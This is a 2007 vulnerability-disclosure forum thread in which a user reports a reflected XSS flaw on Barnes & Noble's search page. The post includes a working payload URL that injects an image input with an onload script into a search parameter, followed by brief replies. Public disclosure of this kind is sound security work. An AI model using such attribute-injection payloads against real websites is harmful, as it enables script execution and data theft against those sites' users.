Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS : Barnes & Noble
Posted by: godberIT
Date: October 22, 2007 10:31AM

Nothing persistant, but a complete ignorance from b&n admins...
Uses a <input type="Image" /> override to avoid tags.

http://www.barnesandnoble.com/booksearch/noresults.asp?SAT=1&SZE=10&TTL=%22%20TYPE=%22IMAGE%22%20src=%22http://images.barnesandnoble.com/presources/images/tab_bookclubs_roll.gif%22%20onload=%22alert('XSS')&Z=y&ERN=210

long desc: http://www.godberit.de/blog/2007/10/22/xss-bn/



Edited 1 time(s). Last edit at 10/22/2007 10:32AM by godberIT.

Options: ReplyQuote
Re: XSS : Barnes & Noble
Posted by: Spyware
Date: October 22, 2007 11:06AM

Cool and all, but why don't you post this in the "So it begins" thread?

Options: ReplyQuote
Re: XSS : Barnes & Noble
Posted by: hackathology
Date: November 04, 2007 09:19AM

cool and smart one.

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.